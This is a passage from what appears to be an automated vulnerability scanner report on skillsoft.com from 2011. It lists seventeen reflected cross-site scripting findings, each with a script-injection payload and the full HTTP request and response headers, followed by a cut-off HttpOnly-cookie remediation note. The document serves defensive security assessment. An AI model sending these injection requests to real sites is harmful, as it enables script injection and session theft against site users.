This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/compliance.asp?727c3"><script>alert(1)</script>11f582872a9=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 49715 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.57. http://skillsoft.com/products/course_collections/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eada0"><script>alert(1)</script>9e73194187e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/default.asp?eada0"><script>alert(1)</script>9e73194187e=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51680 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.58. http://skillsoft.com/products/course_collections/desktop_skills.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/desktop_skills.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76b25"><script>alert(1)</script>6f44f8f09de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/desktop_skills.asp?76b25"><script>alert(1)</script>6f44f8f09de=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 49486 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:45:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.59. http://skillsoft.com/products/course_collections/esh.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/esh.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0477"><script>alert(1)</script>870ebd02137 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/esh.asp?f0477"><script>alert(1)</script>870ebd02137=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 49458 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.60. http://skillsoft.com/products/course_collections/legal.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/legal.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54d8"><script>alert(1)</script>69f4805c1f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/legal.asp?d54d8"><script>alert(1)</script>69f4805c1f=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 62419 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:45:54 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.61. http://skillsoft.com/products/course_collections/skillsims.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/course_collections/skillsims.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d1ae"><script>alert(1)</script>99fc7ac07d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/course_collections/skillsims.asp?9d1ae"><script>alert(1)</script>99fc7ac07d=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47898 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:47:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.62. http://skillsoft.com/products/custom_content/SkillStudio.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/custom_content/SkillStudio.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77984"><script>alert(1)</script>bb2160d630c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/custom_content/SkillStudio.asp?77984"><script>alert(1)</script>bb2160d630c=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47293 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:47:13 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.63. http://skillsoft.com/products/custom_content/custom_solutions.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/custom_content/custom_solutions.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec8b2"><script>alert(1)</script>3ced22e4d1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/custom_content/custom_solutions.asp?ec8b2"><script>alert(1)</script>3ced22e4d1d=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47223 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:46:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.64. http://skillsoft.com/products/custom_content/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/custom_content/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da52b"><script>alert(1)</script>a3145bdd2f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/custom_content/default.asp?da52b"><script>alert(1)</script>a3145bdd2f7=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 45347 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:46:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.65. http://skillsoft.com/products/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b12"><script>alert(1)</script>04ca917af09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/default.asp?f9b12"><script>alert(1)</script>04ca917af09=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48763 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:44:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.66. http://skillsoft.com/products/inGenius/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/inGenius/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d21a3"><script>alert(1)</script>4e7978cd3b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/inGenius/default.asp?d21a3"><script>alert(1)</script>4e7978cd3b9=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 48912 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:47:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.67. http://skillsoft.com/products/live_learning/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/live_learning/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3b6d"><script>alert(1)</script>df9325b99a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/live_learning/default.asp?d3b6d"><script>alert(1)</script>df9325b99a7=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51234 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.68. http://skillsoft.com/products/live_learning/demos.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/live_learning/demos.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fb31"><script>alert(1)</script>370c3e546ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/live_learning/demos.asp?6fb31"><script>alert(1)</script>370c3e546ab=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 53350 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:49:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.69. http://skillsoft.com/products/lms_integration.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/lms_integration.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea9b"><script>alert(1)</script>a6457a2e098 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/lms_integration.asp?6ea9b"><script>alert(1)</script>a6457a2e098=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 51713 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:48:57 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.70. http://skillsoft.com/products/virtual_classroom/default.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/products/virtual_classroom/default.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23f8a"><script>alert(1)</script>54994a58df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /products/virtual_classroom/default.asp?23f8a"><script>alert(1)</script>54994a58df=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54892 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:47:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.71. http://skillsoft.com/search.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/search.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5dd"><script>alert(1)</script>25060319d0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.asp?ad5dd"><script>alert(1)</script>25060319d0f=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 32717 Content-Type: text/html Expires: Mon, 03 Jan 2011 12:49:51 GMT Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.72. http://skillsoft.com/sitemap.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/sitemap.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645e3"><script>alert(1)</script>48088c218f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap.asp?645e3"><script>alert(1)</script>48088c218f=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 58276 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
1.73. http://skillsoft.com/terms.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://skillsoft.com
Path:
/terms.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ae5e"><script>alert(1)</script>f7badaa9f96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /terms.asp?2ae5e"><script>alert(1)</script>f7badaa9f96=1 HTTP/1.1 Host: skillsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 50308 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 03 Jan 2011 12:50:46 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
